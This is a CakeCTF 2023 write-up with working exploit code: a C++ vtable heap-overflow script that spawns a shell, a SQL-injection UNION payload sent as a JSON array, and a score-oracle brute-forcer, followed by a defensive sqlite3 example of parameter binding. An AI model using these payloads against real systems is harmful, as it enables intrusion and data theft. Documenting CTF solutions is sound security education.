# CakeCTF 2023 Writeup

![2023.cakectf.com_ranking_](https://hackmd.io/_uploads/BkgAJQB46.png)

## pwn

### vtable4b

> Do you understand what vtable is?
>
> `nc vtable4b.2023.cakectf.com 9000`
>
> \* The flag exists somewhere in `/` directory.

```
Today, let's learn how to exploit C++ vtable!
You're going to abuse the following C++ class:

  class Cowsay {
  public:
    Cowsay(char *message) : message_(message) {}
    char*& message() { return message_; }
    virtual void dialogue();

  private:
    char *message_;
  };

An instance of this class is allocated in the heap:

  Cowsay *cowsay = new Cowsay(new char[0x18]());

You can
 1. Call `dialogue` method:
    cowsay->dialogue();
 2. Set `message`:
    std::cin >> cowsay->message();

Last but not least, here is the address of `win` function which you should call to get the flag:
<win> = 0x558bdde1a61a

1. Use cowsay
2. Change message
3. Display heap
>
```

```
> 3
   [ address ]       [ heap data ]
                  +------------------+
0x558bdfa8dea0    | 0000000000000000 |
                  +------------------+
0x558bdfa8dea8    | 0000000000000021 |
                  +------------------+
0x558bdfa8deb0    | 0000000000000000 | <-- message (= '')
                  +------------------+
0x558bdfa8deb8    | 0000000000000000 |
                  +------------------+
0x558bdfa8dec0    | 0000000000000000 |
                  +------------------+
0x558bdfa8dec8    | 0000000000000021 |
                  +------------------+
0x558bdfa8ded0    | 0000558bdde1dce8 | ---------------> vtable for Cowsay
                  +------------------+                  +------------------+
0x558bdfa8ded8    | 0000558bdfa8deb0 |   0x558bdde1dce8 | 0000558bdde1a6e2 |
                  +------------------+                  +------------------+
0x558bdfa8dee0    | 0000000000000000 |                    --> Cowsay::dialogue
                  +------------------+
0x558bdfa8dee8    | 000000000000f121 |
                  +------------------+
```

```python
from ptrlib import *

sock = Socket('vtable4b.2023.cakectf.com', 9000)

# Parse "<win> = 0x..." printed by the challenge
win_addr = int(sock.recvlineafter('flag:\n').decode()[10:], 16)

# Dump the heap to learn where the message buffer lives
sock.sendlineafter('> ', b'3')
for _ in range(7):
    sock.recvline()
message_addr = int(sock.recvline().decode()[:14], 16)

# Fake vtable (pointing at win) inside the message buffer,
# then overflow into the Cowsay object and replace its vtable pointer
payload = b''
payload += p64(win_addr)
payload += b'A' * 0x18
payload += p64(message_addr)

sock.sendlineafter('> ', b'2')
sock.sendlineafter('Message: ', payload)

# Calling dialogue() now dispatches through the fake vtable
sock.sendlineafter('> ', b'1')

sock.sh()
sock.close()
```

#### Flag

`CakeCTF{vt4bl3_1s_ju5t_4n_arr4y_0f_funct1on_p0int3rs}`

## web

### Country DB

> Do you know which country code 'CA' and 'KE' are for?
> Search country codes here!

```javascript
fetch('/api/search', {
  method: 'POST',
  headers: {
    'content-type': 'application/json',
  },
  body: JSON.stringify({
    code: [
      '\') union select flag from flag --',
      '',
    ],
  })
});
```

#### Flag

`CakeCTF{b3_c4refUl_wh3n_y0U_u5e_JS0N_1nPut}`

### TOWFL

> Do you speak the language of wolves?
> Prove your skill here!

```python
import json
import requests

base_url = 'http://towfl.2023.cakectf.com:8888'


def main():
    answers = [[None] * 10 for _ in range(10)]

    r = requests.post(f'{base_url}/api/start')
    cookies = r.cookies

    # Brute-force one question at a time, using the score as an oracle
    for i in range(10):
        for j in range(10):
            for k in range(4):
                answers[i][j] = k
                r = requests.post(f'{base_url}/api/submit', json=answers, cookies=cookies)
                r = requests.get(f'{base_url}/api/score', cookies=cookies)
                data = r.json()
                if data['data']['score'] == i * 10 + j + 1:
                    if data['data']['score'] == 100:
                        print(data['data']['flag'])
                        return
                    else:
                        break


if __name__ == '__main__':
    main()
```

#### Flag

`CakeCTF{b3_c4ut10us_1f_s3ss10n_1s_cl13nt_s1d3_0r_s3rv3r_s1d3}`
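Back to the Country DB challenge above: the bug its payload relies on is a JSON array reaching a SQL query built by string interpolation. The following Python/sqlite3 model is an added example, not the challenge's server code; the table names `country` and `flag`, the parenthesised `WHERE (code = '...')` query shape, the `len(code) != 2` check and the comma-joined array coercion are all assumptions chosen to reproduce the behaviour the page's payload depends on (JavaScript stringifies an array as its elements joined by commas, so a two-element array passes a length check and still lands in the query). `vulnerable_search` shows the weak pattern; `safe_search` shows the check a defender wants: reject anything that is not a two-letter string, then bind the value as a parameter.

```python
import sqlite3

# Constructed stand-in for the challenge database (assumption: the real schema is not on the page).
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE country (code TEXT, name TEXT);
        INSERT INTO country VALUES ('CA', 'Canada'), ('KE', 'Kenya');
        CREATE TABLE flag (flag TEXT);
        INSERT INTO flag VALUES ('CakeCTF{placeholder}');
    """)
    return db

# The request body from the writeup as a Python value: a two-element JSON array.
PAYLOAD = ["') union select flag from flag --", ""]

def vulnerable_search(db, code):
    """Assumed weak pattern: a length check followed by string interpolation.
    A two-element array satisfies len(code) == 2, and a JavaScript template
    string would stringify it with a comma; ",".join() reproduces that here."""
    if len(code) != 2:
        return []
    if isinstance(code, list):
        code = ",".join(code)
    # Assumed query shape; the payload's leading ') closes the string and the paren.
    sql = f"SELECT name FROM country WHERE (code = '{code}')"
    return [row[0] for row in db.execute(sql)]

def safe_search(db, code):
    """Hardened version: enforce the type and shape of the input, then bind it
    as a parameter so the database never parses it as SQL."""
    if not isinstance(code, str) or len(code) != 2 or not code.isalpha():
        raise ValueError("code must be a two-letter string")
    rows = db.execute("SELECT name FROM country WHERE (code = ?)", (code,))
    return [row[0] for row in rows]

if __name__ == "__main__":
    db = make_db()
    print(vulnerable_search(db, "CA"))     # ['Canada']
    print(vulnerable_search(db, PAYLOAD))  # the flag row leaks through the UNION
    print(safe_search(db, "CA"))           # ['Canada']
    try:
        safe_search(db, PAYLOAD)
    except ValueError as e:
        print("rejected:", e)
```

The type check matters as much as the parameter binding: JSON lets a client send an array, object, number or null where the server expects a string, and `len()`-style checks are satisfied by more than strings. Validating the shape first and binding second closes both halves of the bug.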